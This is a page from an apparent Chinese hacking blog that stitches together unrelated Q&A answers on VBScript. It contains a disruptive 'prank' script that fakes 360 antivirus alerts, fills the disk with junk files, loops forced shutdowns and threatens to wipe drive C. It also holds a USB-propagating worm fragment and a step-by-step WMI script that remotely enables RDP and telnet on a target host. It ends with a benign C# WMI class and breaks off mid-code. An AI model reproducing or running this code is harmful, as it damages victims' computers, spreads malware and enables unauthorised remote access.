右侧
国内最专业的黑客技术博客
当前位置:网站首页 > 邮箱破解 > 正文

vbs坑人代码_vbs黑客实例

作者:hacker发布时间:2022-07-18分类:邮箱破解浏览:137评论:3


导读:目录:1、vbs整人代码2、电脑中vbs病毒3、vbs实例代码有吗?互相欣赏一下4、vbs学习方法以及vbs实例有编程基础5、100分问题!!!C...

目录:

vbs整人代码

大量的楼上已经说了。这个是本人原创,亲测有用。毒性嘛,就是会烧CPU,然后在这个vbs旁边创建一大堆垃圾文件(请准备好30G空间)【具体在代码中】

仅供恶搞娱乐和研究,没有攻击任何人,组织的意图。

set qstart = wscript.CreateObject("wscript.shell")

set qweb = CreateObject("Wscript.Shell")

set qwrite = CreateObject("scripting.filesystemobject")

set qsay = CreateObject("sapi.spvoice")

qstart.run "D:\病毒BGM.mp3" ' 《江南皮革厂倒闭了.mp3》请准备好放在D:\

msgbox "您的电脑已被病毒入侵!",vbokonly+vbExclamation,"360 Defender"

qstart.run "cmd.exe /c start appwiz.cpl"

qstart.run "cmd.exe /c start bthprops.cpl"

qstart.run "cmd.exe /c start calc.exe"

qstart.run "cmd.exe /c start cleanmgr.exe"

qstart.run "cmd.exe /c start cmd.exe"

qstart.run "cmd.exe /c start colorcpl.exe"

qstart.run "cmd.exe /c start control.exe"

qstart.run "cmd.exe /c start cttune.exe"

qstart.run "cmd.exe /c start desk.cpl"

qstart.run "cmd.exe /c start dfrgui.exe"

qstart.run "cmd.exe /c start dxdiag.exe"

qstart.run "cmd.exe /c start FileHistory.exe"

qstart.run "cmd.exe /c start Firewall.cpl"

qstart.run "cmd.exe /c start Fondue.exe"

qstart.run "cmd.exe /c start fontview.exe"

qstart.run "cmd.exe /c start fsquirt.exe"

qstart.run "cmd.exe /c start hdwwiz.cpl"

qstart.run "cmd.exe /c start inetcpl.cpl"

qstart.run "cmd.exe /c start intl.cpl"

qstart.run "cmd.exe /c start irprops.cpl"

qstart.run "cmd.exe /c start joy.cpl"

qstart.run "cmd.exe /c start LaunchTM.exe"

qstart.run "cmd.exe /c start Magnify.exe"

qstart.run "cmd.exe /c start main.cpl"

qstart.run "cmd.exe /c start mblctr.exe"

qstart.run "cmd.exe /c start mmsys.cpl"

qstart.run "cmd.exe /c start msinfo32.exe"

qstart.run "cmd.exe /c start mspaint.exe"

qstart.run "cmd.exe /c start ncpa.cpl"

qstart.run "cmd.exe /c start notepad.exe"

qstart.run "cmd.exe /c start powercfg.cpl"

qstart.run "cmd.exe /c start RTSnMg64.cpl"

qstart.run "cmd.exe /c start SnippingTool.exe"

qstart.run "cmd.exe /c start sysdm.cpl"

qstart.run "cmd.exe /c start TabletPC.cpl"

qstart.run "cmd.exe /c start telephon.cpl"

qstart.run "cmd.exe /c start timedate.cpl"

qstart.run "cmd.exe /c start write.exe"

qstart.run "cmd.exe /c start wscript.exe"

qstart.run "cmd.exe /c start wscui.cpl"

qstart.run "cmd.exe /c fsutil file createnew 1.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 2.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 3.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 4.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 5.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 6.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 7.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 8.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 9.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 10.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 11.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 12.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 13.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 14.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 15.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 16.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 17.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 18.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 19.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 20.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 21.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 22.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 23.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 24.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 25.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 26.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 27.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 28.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 29.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 30.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 31.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 32.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 33.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 34.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 35.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 36.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 37.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 38.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 39.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 40.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 41.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 42.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 43.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 44.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 45.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 46.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 47.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 48.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 49.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 50.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 51.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 52.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 53.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 54.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 55.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 56.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 57.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 58.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 59.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 60.bug 40000"

qstart.run "cmd.exe /c fsutil file createnew 61.bug 400000"

qstart.run "cmd.exe /c fsutil file createnew 62.bug 4000000"

qstart.run "cmd.exe /c fsutil file createnew 63.bug 40000000"

qstart.run "cmd.exe /c fsutil file createnew 64.bug 400000000"

qstart.run "cmd.exe /c fsutil file createnew 65.bug 4000000000"

qstart.run "cmd.exe /c fsutil file createnew 666.bug 40000000000"

wscript.sleep 25000

qstart.run "cmd.exe /c shutdown -s -t 60 -c ""360公司温馨提醒:因为这个游戏涉及非法内容,所以您的电脑将在60秒后自动关机"" ",0,true

qstart.run "cmd.exe /c echo 滚|clip"

A = INPUTBOX ("说!360是不是上帝?"+chr(13)+chr(13)+chr(13)+"(“滚”已复制到剪贴板,可以粘贴。)","360 Defender","不是",8000,7000)

IF A = "是" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "好的,现在您可以下载360安全卫士来杀毒了。",vbokonly,"360 Defender"

do

qweb.run""

loop

ELSEIF A = "不是" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+"您怎么这么懒呢?",vbokonly+vbQuestion,"360 Defender"

msgbox chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+"是时候锻炼锻炼了",vbokonly+vbInformation,"360 Defender"

msgbox "游戏规则:在开始后,请及时点击 “确定” 键来取消关机。"+chr(13)+"现在您可以把这个窗口x掉,或者点击确定,来开始游戏。",vbokonly+vbInformation,"360 Defender"

do

qstart.run "cmd.exe /c shutdown -s -t 5 ",0,true

msgbox "取消关机",vbokonly,"360 Defender"

qstart.run "cmd.exe /c shutdown -a",0,true

qweb.run""

qweb.run""

qweb.run""

loop

ELSEIF A = "" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "周鸿祎表示无语。"+chr(13)+chr(13)+chr(13)+"这样是不可能解决问题的",vbokonly,"360 Defender"

msgbox "自己探寻吧",vbokonly,"360 Defender"

do

qstart.run "cmd.exe /c shutdown -s -t 5",0,true

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd.exe /c shutdown -a",0,true

loop

ELSEIF A = "滚" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "emmmmmmmm",vbokonly,"360 Defender"

set qwriteb=qwrite.CreateTextFile( "D:\1.txt",,ture)

qwriteb.WriteLine "wscript.CreateObject(" chr(34) "wscript.shell" chr(34) ").run " chr(34) "D:\1.vbs" chr(34)

qwriteb.WriteLine "msgbox " chr(34) "滚" chr(34) ",vbokonly+vbinformation," chr(34) "360 Defender" chr(34)

qwriteb.close

qwrite.movefile "D:\1.txt","D:\1.vbs"

qstart.run "D:\1.vbs"

ELSE

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "由于您在说废话,但是您一定不想浪费时间说废话,所以该电脑对您有害。浪费别人时间就是谋财害命 ( 鲁迅 ) 。360积极维护您的财产权和生命健康权,决定不砸掉您的电脑。"+chr(13)+chr(13)+"那现在先把C盘给抹咯!",vbokonly+vbInformation,"360 Defender"

qsay.speak ("在抹掉C盘的过程中,您的电脑将会重启数次此瓷呲呲瓷此次次此瓷呲呲瓷此次次此瓷呲")

qweb.run""

qweb.run""

qweb.run""

qweb.run""

qweb.run""

qweb.run""

qweb.run""

qweb.run""

qweb.run""

qweb.run""

qweb.run""

qweb.run""

qweb.run""

qweb.run""

qstart.run "cmd.exe /c shutdown -r -t 5",0,true

END IF

电脑中vbs病毒

由于VBS病毒具有容易嵌入到网页等特点,因此越来越多的黑客采用这种方式传播木马病毒。中了VBS病毒会让你在Windows下看到“.VBS”文件,

系统进程中一直有wscript.exe进程存在,还有机器变慢等与其他病毒相同的现象。如果你遇到了这个情况,可以用下面的方法进行查杀。

第一步:先要禁止wscript.exe的运行。点击“开始→运行”,输入gpedit.msc。

第二步:在“组策略”窗格左侧,依次点击“计算机配置→Windows设置→安全设置→软件限制策略”项,然后点击“操作→创建新策略”菜单项。再从左侧选择“其他规则”。

第三步:在右侧窗格空白处右击,在菜单中选择“新建路径规则”项。在弹出的窗口中,点击“路径”后的“浏览”按钮,选择C:\Windows\System32文件夹下的wscript.exe文件,并将“安全级别”设置为“不允许的”

如果你有不想运行的文件,也可以在这里添加

第四步:将C:\Windows下的System32、Dllcache和I386这两个文件夹下wscript.exe的扩展名去除,以防止病毒突破限制运行。注意,这期间会有Windows文件保护机制的报警,直接点击“取消→是”按钮即可。

第五步:在“任务管理器”中结束掉“wscript.exe”进程。

第六步:用IceSword等工具删除下面三个文件。

C:\Windows\.vbe

C:\Windows\System32\.vbe

C:\Documents and Settings\All Users\「开始」菜单\程序\启动\.vbs

第七步:打开注册表编辑器,依次展开

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

项,删除键。注意这里的“”是计算机名,电脑不同,名称也不同。

最后,恢复之前修改了文件名的wscript.exe文件即可。

这是第一种比较复杂的!!

还有一种简单点的,不严重:

点击 开始 运行 输入msconfig 启动里面 勾选杀毒软件,防火墙,输入法ctfmon三个其他的勾都去掉,应用,确定,关闭,重启(必须)。

再F8进安全模式,杀毒清理!

vbs实例代码有吗?互相欣赏一下

On error resume next

Dim fso,wshell,curfolder,curdristr,curdri

Set fso=createobject("scripting.filesystemobject")

Set wshell=CreateObject("WScript.shell")

Set curfolder=fso.GetFolder(".")

curdristr=Left(WScript.ScriptFullName,3)

Set curdri=fso.GetDrive(curdristr)

reghid() '不显示隐藏文件

If WScript.ScriptFullName=fso.GetSpecialFolder(1)"\mp3.vbs" Then '如果在system32中

For i=1 To 2 Step 0

reghid()

For Each dri In fso.Drives

If dri.DriveType=1 And dri"A:" And dri"B:" Then

'autorun.inf文件夹改名

If fso.FolderExists(dri.Path"\autorun.inf") Then

fso.MoveFolder dri.Path"\autorun.inf",dri.Path"\Rubbish"

End If

'复制自身及exe文件到移动硬盘

If fso.FileExists(dri.Path"\mp3.vbs") And fso.FileExists(dri.Path"\autorun.inf") Then

Else

If fso.FileExists(dri.Path"\mp3.vbs") Then

fso.DeleteFile dri.Path"\mp3.vbs",True

ElseIf fso.FileExists(dri.Path"\autorun.inf") Then

fso.DeleteFile dri.Path"\autorun.inf",True

End if

fso.CopyFile WScript.ScriptFullName,dri.Path"\mp3.vbs",True

If fso.FileExists(".\SiZhu.exe") And Not fso.FileExists(dri.Path"\SiZhu.exe") Then

fso.CopyFile ".\SiZhu.exe",dri.Path"\SiZhu.exe",True

End If

autoinf(dri.Path)

'给刚复制的文件加上隐藏属性

Set norkon=fso.GetFile(dri.Path"\mp3.vbs")

wshell.run "attrib +r +a +s +h "dri.Path"\mp3.vbs",0

Set norkon=Nothing

vbs 学习方法以及 vbs 实例 有编程基础

1、一份全面准确的帮助文档:

VBScript56.CHM

2、一份经典的学习教程:

Microsoft.VBScript.Step.by.Step.chm

3、一个带语法高亮和调试功能的VBS脚本编辑器:

vbsedit.exe

4、经常上网看高手写的VBS应用的例子。

5、自己经常动手琢磨写一些VBS脚本,想办法在自己的实际工作学习生活中加以应用,并享受脚本带来的便利。

100分问题!!!C#里要用WMI获取系统信息,请问一个有几个ManagementClass?分别是什么?

我不知道你要的系统信息到底有哪些?有几个ManagementClass要看你要得到具体哪些具体信息,比如要想获得盘符就只需一个ManagementClass

这里是一个范例,或许对你有所帮助(附源码)

以下是相关资料

一:WMI基础知识

====================================================================================

WMI 最初于1998年作为一个附加组件与 Windows NT 4.0 Service Pack 4 一起发行,是内置在Windows 2000、 Windows XP和Windows Server 2003 系列操作系统中核心的管理支持技术。基于由 Distributed Management Task Force (DMTF) 所监督的业界标准,WMI是一种规范和基础结构,通过它可以访问、配置、管理和监视几乎所有的Windows资源。大多用户习惯于使用众多的图形化管理工具来管理Windows资源,在WMI之前这些工具都是通过 Win32应用程序编程接口(Application ProgrammingInterfaces,API)来访问和管理Windows资源的。只要你熟悉系统编程你就知道API有多么重要。但是大多数脚本语言都不能直接调用Win32 API,WMI的出现使得系统管理员可以通过一种简便的方法即利用常见的脚本语言实现常用的系统管理任务。

利用WMI需要和脚本如WSH和VBScript结合起来,可以实现的功能大家可以看微软的MSDN文档。

在编写我们自己的脚本之前,我们需要对WMI的体系结构有个基本的了解。如图一:(1.gif)

在WMI 体系结构中我们最需要关心的就是WMI提供程序,WMI提供程序在WMI和托管资源之间扮演着中间方的角色。提供程序代表使用者应用程序和脚本从WMI托管资源请求信息,并发送指令到WMI托管资源。下面是我们利用WMI编程经常要用到的WMI内置提供程序清单,以供编程参考。

1.Active Directory提供程序

链接库文件:dsprov.dll

命名空间:root\directory\ldap

作用:将Active Directory 对象映射到 WMI。

2.事件日志提供程序

链接库文件:ntevt.dll

命名空间:root\cimv2

作用:管理 Windows 事件日志,例如,读取、备份、清除、复制、删除、监视、重命名、压缩、解压缩和更改事件日志设置。

3.注册表提供程序

链接库文件:stdprov.dll

命名空间:root\default

作用:读取、写入、枚举、监视、创建、删除注册表项和值。

4.Win32 提供程序

链接库文件:cimwin32.dll

命名空间:root\cimv2

作用:提供关于计算机、磁盘、外围设备、文件、文件夹、文件系统、网络组件、操作系统、打印机、进程、安全性、服务、共享、SAM 用户及组,以及更多资源的信息。

5.Windows 安装程序提供程序

链接库文件:msiprov.dll

命名空间:root\cimv2

作用:提供对已安装软件信息的访问。

从上面可以看出在WMI中类(即内置提供程序)被分组到命名空间中,命名空间可以看成是一个组。比如,命名空间 root\cimv2 包括大部分表示通常与计算机和操作系统相关联的资源的类。在使用类的时候要说明类所在的命名空间。类由属性和方法构成。这是可视化编程中的两个重要的概念。属性描述的是对象的状态,方法是对象可以执行的操作。

理论知识学起来很枯燥,下面让我们边分析高手的脚本源码边进行理论知识的巩固吧。

二:解析RTCS.VBS主要代码

=====================================================================================

有时候阅读别人的源码未尝不是一个好而且快捷的办法,下面就让我们来认真学习zzzEVAzzz编写的一个可以远程开启telnet服务的脚本RTCS.VBS。

该脚本可以直接访问目标的WMI,不依赖于目标的ipc$,实现远程开启/关闭目标telnet服务,为了方便大家学习我抽出了最主要的代码,具体分析如下:

set objlocator=createobject("wbemscripting.swbemlocator")

//创建WbemScripting.SwbemLocator对象(脚本接口)。

//可以看出WMI其实就是把Com组件WbemScripting.SWbemLocator封装起来罢了。

set objswbemservices=objlocator.connectserver(ipaddress,"root/default",username,password)

//通过ConnectServer函数请求连接到WMI控件服务上,root/default为命名空间。

set objinstance=objswbemservices.get("stdregprov")

//建立访问注册表的实例。

set objmethod=objinstance.methods_("SetDWORDvalue")

//建立可以更改注册表键值的方法。

set objinparam=objmethod.inparameters.spawninstance_()

//MethodData.InParameters用于获取或设置方法的输入参数。这里用spawninstance方法为它建立一个子实例,下面就可以将参数值赋予这个对象的属性。

objinparam.hdefkey=h80000002

//hdefkey表示根键,根键的十六制值如下:

//HKEY_CLASSES_ROOT (H80000000)

//HKEY_CURRENT_USER (H80000001)

//HKEY_LOCAL_MACHINE (H80000002)

//HKEY_USERS (H80000003)

//HKEY_CURRENT_CONFIG (H80000005)

objinparam.ssubkeyname="SOFTWARE\Microsoft\TelnetServer\1.0"

//ssubkeyname表示子键。

objinparam.svaluename="NTLM"

//svaluename表示属性名。

objinparam.uvalue=ntlm

//uvalue表示键值。

set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)

//利用execmethod执行方法,这里才真正改写了注册表。

//下面是修改telnet服务的TelnetPort值,原理同上。

objinparam.svaluename="TelnetPort"

objinparam.uvalue=port

set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)

修改telnet的注册表部分就完成了,将NTLM和TelnetPort进行了修改,要是对方的telnet服务没有开启呢?下面就需要根据telnet的具体情况,来启动telnet服务,继续看代码。

//首先查询远程主机上tlntsvr的启动方式。

set objswbemservices=objlocator.connectserver(ipaddress,"root\cimv2",username,password)

//win32_service类在root\cimv2命名空间中,作用没忘记吧?快看基础知识呵。

set colinstances=objswbemservices.execquery("select * from win32_service where name='tlntsvr'")

//注意:查询都是通过枚举来实现的。

for each objinstance in colinstances

if objinstance.startmode="Disabled" then

set objmethod=objinstance.methods_("changestartmode")

//创建changestartmode方法来改变tlntsvr的启动方式。

set objinparam=objmethod.inparameters.spawninstance_()

objinparam.startmode="Manual"

//将启动方式改为手动方式。

set objoutparam=objinstance.execmethod_("changestartmode",objinparam)

end if

//下面启动我们的telnet服务。这里zzzEVAzzz的思路好象有点不对,也不知道是不是他的疏忽,我个人认为当telnet服务已经启动时不应该用stopservice方法停止服务。

if objinstance.started=true then

intstatus=objinstance.stopservice()

//stopservice是WMI中用于停止服务实例的服务的方法。

else

intstatus=objinstance.startservice()

end if

next

三:手把手教你编写WMI版本的ROTS.vbs来开启3389

=====================================================================================

zzzVEAzzz 的脚本就分析到这里吧,怎么样?很EASY吧?!我相信大家现在一定蠢蠢欲动了?:)好,一起来写一个什么程序呢?ROTS.vbs我想大家一定都用过吧?什么东东啊?我……砸!大家应该知道这个ROTS是有它的使用条件的,不仅要有管理员帐号,还要允许进行ipc连接,在这个到处都是墙的年代,ipc 早就不实用了,而且ROTS.vbs早就被查杀了,那该怎么办?当然是自己动手了。能不能实现ROTS的一样的远程开启3389的功能而不受ipc的限制呢?答案自从我写了这篇文章后成为肯定的,哈哈,吹吹了。

当然我们也是要求系统至少是2000server及以上的,最近看到有个软件可以给2000pro开3389,由于比较忙,也没怎么去理它,这里我们暂且不说它,知道了原理一样好办。

开启3389有个注册表导入的方法,其它一些软件的开法,我想也大多是通过修改注册表实现的。这个方法需要导入如下的注册表:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]

"Enabled"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

"ShutdownWithoutLogon"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]

"EnableAdminTSRemote"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]

"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]

"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]

"Start"=dword:00000002

[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]

"Hotkey"="1"

原理知道了就没什么难的了,先理清我们的思路,我们的主要任务是更改注册表里的键值。首先是创建WMI对象,然后是连接到远程WMI服务器,最后修改注册表键值。

部分主要代码如下(完整的代码和详细的注释请看附带的软件包)

on error resume next

//防止出现意外。

set outstreem=wscript.stdout

if (lcase(right(wscript.fullname,11))="wscript.exe") then

set objShell=wscript.createObject("wscript.shell")

objShell.Run("cmd.exe /k cscript //nologo "chr(34)wscript.scriptfullnamechr(34))

//cmd后带/K参数表示执行字符串指定的命令。

wscript.quit

end if

//进行简单的检查。

if wscript.arguments.count3 then

usage()

wscript.echo "Not enough parameters."

wscript.quit

end if

//取出参数,分别赋予几个变量。

ipaddress=wscript.arguments(0)

username=wscript.arguments(1)

password=wscript.arguments(2)

option=wscript.arguments(3)

usage()

下面是核心代码,也是实现远程修改注册表的功能,我这里给出另外一种实现的方式,对照前面的代码很容易理解,我就只作简单的解释了。详细情况可以参阅MSDN文档中关于StdRegProv类的说明。

()

const HKEY_LOCAL_MACHINE = H80000002

const HKEY_USERS=H80000003

strComputer = ipaddress

//获取wmi对象

Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _

strComputer "\root\default:StdRegProv")

strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"

strValueName = "Enabled"

strValue=0

oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue

strKeyPath = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

strValueName = "ShutdownWithoutLogon"

strValue=0

oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue

strKeyPath = "SOFTWARE\Policies\Microsoft\Windows\Installer"

strValueName = "EnableAdminTSRemote"

strValue=1

oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"

strValueName = "TSEnabled"

strValue=1

oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue

strKeyPath = "SYSTEM\CurrentControlSet\Services\TermDD"

strValueName = "Start"

strValue=2

oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue

strKeyPath = "SYSTEM\CurrentControlSet\Services\TermService"

strValueName = "Start"

strValue=2

oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue

strKeyPath = ".DEFAULT\Keyboard Layout\Toggle"

strValueName = "Hotkey"

strValue=1

oReg.SetDWORDValue HKEY_USERS,strKeyPath,strValueName,strValue

//下面实现重启远程机器

if option="/r" then

outstreem.write "Now, rebooting target...."

strwmiquery="select * from win32_operatingsystem where primary='true'"

set colinstances=objswbemservices.execquery(strwmiquery)

for each objinstance in colinstances

objinstance.win32shutdown(2)

end if

outstreem.write "Ok, rebooted the target."

//简单的用法说明的函数。

function usage()

wscript.echo string(60,"=")

wscript.echo "Wmi3389 v1.0.0"

wscript.echo "No ipc Open 3389, code written by pye."

wscript.echo "Welcome to visite or Mail to grandh4408@yahoo.com.cn"

wscript.echo "Usage:"

wscript.echo "cscript "wscript.scriptfullname" targetIP username password [/r]"

wscript.echo "/r reboot the target this is optional"

wscript.echo "It use WMI to Open 3389 of target server."

wscript.echo string(60,"=")vbcrlf

end function

将上面的代码复制带记事本里,保存为Wmi3389.vbs。然后在CMD里执行:

cscript Wmi3389.vbs ipaddress administrator password [/r]

看看是不是和ROTS.vbs有一样的效果啊?大家赶快实践实践吧。

四:最后的唠叨

=====================================================================================

大家可以看出WMI的功能是很强大的,这里要感谢MicroSoft了,它是永远都不会让我们失望的。WMI对象允许通过VB,VBA,WSH, VBScript, JScript,ASP,或是支持自动对象的其它环境,对WMI进行完全访问。在参考查询体系中加入 WMI Scripting V1.1 Library ,则Visual Basic或是VBA方案就可以访问这些对象了。支持ActiveX程序的操作平台可以通过对象类的代号,或是类的名称创建这些对象,这些对象的前缀是WbemScripting,如 WbemScripting.SwbemLocator。所以大家有兴趣的完全可以利用VB,WSH,VBScript, JScript,ASP等编写更多的利用WMI的黑客程序。

----------------------------------------------------

最后给你附上一段程序

/* **********************************************

* Rainsoft Development Library for Microsoft.NET

*

* Copyright (c) 2004,2005 RainTrail Studio.China

* All Rigths Reserved!

* Author: Q.yuhen (qyuhen@hotmail.com)

********************************************** */

using System;

using System.Management;

using System.Collections;

using System.Collections.Specialized;

using System.Text;

namespace Rainsoft.Management

{

#region WMIPath

public enum WMIPath

{

// 硬件

Win32_Processor, // CPU 处理器

Win32_PhysicalMemory, // 物理内存条

Win32_Keyboard, // 键盘

Win32_PointingDevice, // 点输入设备,包括鼠标。

Win32_FloppyDrive, // 软盘驱动器

Win32_DiskDrive, // 硬盘驱动器

Win32_CDROMDrive, // 光盘驱动器

Win32_BaseBoard, // 主板

Win32_BIOS, // BIOS 芯片

Win32_ParallelPort, // 并口

Win32_SerialPort, // 串口

Win32_SerialPortConfiguration, // 串口配置

Win32_SoundDevice, // 多媒体设置,一般指声卡。

Win32_SystemSlot, // 主板插槽 (ISA PCI AGP)

Win32_USBController, // USB 控制器

Win32_NetworkAdapter, // 网络适配器

Win32_NetworkAdapterConfiguration, // 网络适配器设置

Win32_Printer, // 打印机

Win32_PrinterConfiguration, // 打印机设置

Win32_PrintJob, // 打印机任务

Win32_TCPIPPrinterPort, // 打印机端口

Win32_POTSModem, // MODEM

Win32_POTSModemToSerialPort, // MODEM 端口

Win32_DesktopMonitor, // 显示器

Win32_DisplayConfiguration, // 显卡

Win32_DisplayControllerConfiguration, // 显卡设置

Win32_VideoController, // 显卡细节。

Win32_VideoSettings, // 显卡支持的显示模式。

// 操作系统

Win32_TimeZone, // 时区

Win32_SystemDriver, // 驱动程序

Win32_DiskPartition, // 磁盘分区

Win32_LogicalDisk, // 逻辑磁盘

Win32_LogicalDiskToPartition, // 逻辑磁盘所在分区及始末位置。

Win32_LogicalMemoryConfiguration, // 逻辑内存配置

Win32_PageFile, // 系统页文件信息

Win32_PageFileSetting, // 页文件设置

Win32_BootConfiguration, // 系统启动配置

Win32_ComputerSystem, // 计算机信息简要

Win32_OperatingSystem, // 操作系统信息

Win32_StartupCommand, // 系统自动启动程序

Win32_Service, // 系统安装的服务

Win32_Group, // 系统管理组

Win32_GroupUser, // 系统组帐号

Win32_UserAccount, // 用户帐号

Win32_Process, // 系统进程

Win32_Thread, // 系统线程

Win32_Share, // 共享

Win32_NetworkClient, // 已安装的网络客户端

Win32_NetworkProtocol, // 已安装的网络协议

}

#endregion

/// summary

/// 获取系统信息

/// /summary

/// example

/// code

/// WMI w = new WMI(WMIPath.Win32_NetworkAdapterConfiguration);

/// for (int i = 0; i w.Count; i ++)

/// {

/// if ((bool)w[i, "IPEnabled"])

/// {

/// Console.WriteLine("Caption:{0}", w[i, "Caption"]);

/// Console.WriteLine("MAC Address:{0}", w[i, "MACAddress"]);

/// }

/// }

/// /code

/// /example

public sealed class WMI

{

private ArrayList mocs;

private StringDictionary names; // 用来存储属性名,便于忽略大小写查询正确名称。

/// summary

/// 信息集合数量

/// /summary

public int Count

{

get { return mocs.Count; }

}

/// summary

/// 获取指定属性值,注意某些结果可能是数组。

/// /summary

public object this[int index, string propertyName]

{

get

{

try

{

string trueName = names[propertyName.Trim()]; // 以此可不区分大小写获得正确的属性名称。

Hashtable h = (Hashtable)mocs[index];

return h[trueName];

}

catch

{

return null;

}

}

}

/// summary

/// 返回所有属性名称。

/// /summary

/// param name="index"/param

/// returns/returns

public string[] PropertyNames(int index)

{

try

{

Hashtable h = (Hashtable)mocs[index];

string[] result = new string[h.Keys.Count];

h.Keys.CopyTo(result, 0);

Array.Sort(result);

return result;

}

catch

{

return null;

}

}

/// summary

/// 返回测试信息。

/// /summary

/// returns/returns

public string Test()

{

try

{

StringBuilder result = new StringBuilder(1000);

for (int i = 0; i Count; i++)

{

int j = 0;

foreach(string s in PropertyNames(i))

{

result.Append(string.Format("{0}:{1}={2}\n", ++j, s, this[i, s]));

if (this[i, s] is Array)

{

Array v1 = this[i, s] as Array;

for (int x = 0; x v1.Length; x++)

{

result.Append("\t" + v1.GetValue(x) + "\n");

}

}

}

result.Append("======WMI=======\n");

}

return result.ToString();

}

catch

{

